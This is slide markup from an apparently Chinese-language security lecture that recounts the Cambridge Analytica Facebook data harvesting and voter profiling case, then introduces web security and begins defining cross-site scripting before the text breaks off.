              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>先讲结论，如果特朗普不雇佣那个“分析团队”，如果没有这场大数据操控的话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>现在的美国总统，是希拉里</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特朗普这一生做的最正确的决定之一就在于，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年，聘请了一家强大的，在当时却不为人知的大数据分析公司</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>剑桥分析公司（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>Cambridge Analytica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“剑桥分析”的第一步，就是先掌握大数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>美国社群网络三巨头，脸书，推特，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>IG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中尤以脸书为最大头，所以剑桥分析着手从脸书下手，抓取用户大数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>他们在网上搞了个大型心理测试，标榜是剑桥大学讲师所出的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大家一看是剑桥大学的心理专家所出的心理测试题，于是纷纷参与</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而这个心理测试的最后，设定了一个陷阱，就是他要你登陆你的“脸书账户”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD91849-DA56-7B47-80BC-404DDBDE66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1174" y="1085820"/>
            <a:ext cx="2467227" cy="138688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F61D079F-D001-A846-8FAC-A3A449B627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2748" y="2640789"/>
            <a:ext cx="4520011" cy="184567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CA812FE3-CEE1-9248-A3D7-87656E5E9B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27809" y="4710348"/>
            <a:ext cx="4322261" cy="13987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71011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4.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全的机密性 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DED8531-D365-1D47-AAB5-E0A3378C8234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458182" y="1633433"/>
            <a:ext cx="6231685" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>美其名曰，登陆脸书账户后，心理测试结果会通过脸书发给你</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但实际上，在你同意登陆账户的那一刻，他就能读取你的姓名，生日，婚姻状况，所在位置，还有最重要的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>你所发的文章，以及你所点赞的文章</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这非常重要</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果你参与了这项心理测试，那你的心理特征就能被分析出来</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>再结合你平时所发的，所浏览的，所点赞的文章</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>大数据分析公司根据这些东西，足以分析出你这个人的性格和特质</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>他们会为你建立一个快速，准确，且有效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>“心理模型”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2056" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9001B9D-56B8-054C-9113-816A5FCE69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3782" y="1574436"/>
            <a:ext cx="4113863" cy="1708396"/>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114645E2-C16B-B74D-BCD9-F75828DF67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4789" y="3995337"/>
            <a:ext cx="4128442" cy="1922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51684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4.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全的机密性 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DED8531-D365-1D47-AAB5-E0A3378C8234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458182" y="1633433"/>
            <a:ext cx="6231685" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>于是一个个精准的个人“心理模型”出炉，随后他们被分类，归群</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相近心理特征划入同类群组，随后形成一个个有特质的群组</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对付不同心理特质的不同群组的人，要用不同的“煽动和操纵”手法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年，有高达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8700</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>万名脸书用户的大数据，到了剑桥分析手中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最后利用这些大数据所制成的个人心理模型，几乎遍及了全美国三分之一的选民</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也就是说，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年，美国有三分之一的选民，被大数据公司掌握了数据，制作了心理模型，并且归入了相应的“心理群组”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>那么，当掌握了如此庞大的数据后，接下来的步骤就是</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>我，该怎么操纵你了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1783E19-3758-F742-BF00-0138E2EB77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23726" y="1427521"/>
            <a:ext cx="3569605" cy="1769929"/>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7858C2BD-37CD-5841-8C59-B349E65B4A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16228" y="4031389"/>
            <a:ext cx="3784600" cy="223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84969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2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654005" y="1328948"/>
            <a:ext cx="6096000" cy="5447645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序是一种可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，程序的最大好处是用户很容易访问应用程序，用户只需要有浏览器即可，不需要再安装其他软件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序是由完成特定任务的各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>组件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web components)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构成的并通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将服务展示给外界。在实际应用中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序是由多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>页面、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>图像文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等组成。所有这些组件相互协调为用户提供一组完整的服务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站安全非常重要，因为没有人希望拥有被黑的网站。建立安全的网站与拥有网站托管者一样，对于某人的在线状态至关重要。例如，如果某个网站被黑客入侵并列入黑名单，则该网站最多会损失其流量的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>98</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>％。没有安全的网站可能与完全没有网站一样糟糕，甚至更糟。例如，客户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>数据泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可能导致诉讼，高额罚款和声誉受损。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Advanced Web Technologies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF0CD159-F0B8-4F16-81C1-FE2E92C1458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43643" y="1193325"/>
            <a:ext cx="4295857" cy="213002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nternet and the world wide web are not the same thing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4626E83-D176-AD46-8E9B-552226C586A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164677" y="3903300"/>
            <a:ext cx="3934146" cy="2205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9486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2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584529" y="983142"/>
            <a:ext cx="10769271" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS (Cross-Site Scripting)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，跨站脚本攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跨站脚本攻击是指通过存在安全漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网站注册用户的浏览器内运行非法的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>标签或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行的一种攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跨站脚本攻击有可能造成以下影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
